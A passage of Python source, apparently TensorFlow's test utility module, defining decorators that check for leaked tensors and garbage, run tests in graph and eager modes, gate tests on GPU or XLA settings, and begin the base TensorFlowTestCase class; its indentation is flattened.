obj_count_by_type = _get_object_count_by_type() - obj_count_by_type
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically checks
generated graph. Attempting to evaluate graph or function results via.
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def eager_lazy_remote_copy_on_and_off(f):
"""Execute the test method w/o lazy tensor copy for function remote inputs."""
@parameterized.named_parameters([("WithLazyRemoteCopy", True), ("", False)])
@functools.wraps(f)
def decorator(self, lazily_remote_copy, *args, **kwargs):
if lazily_remote_copy:
context.context().lazy_remote_inputs_copy = True
else:
context.context().lazy_remote_inputs_copy = False
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was build with CUDA support.
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if is_tfrt_enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if is_tfrt_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
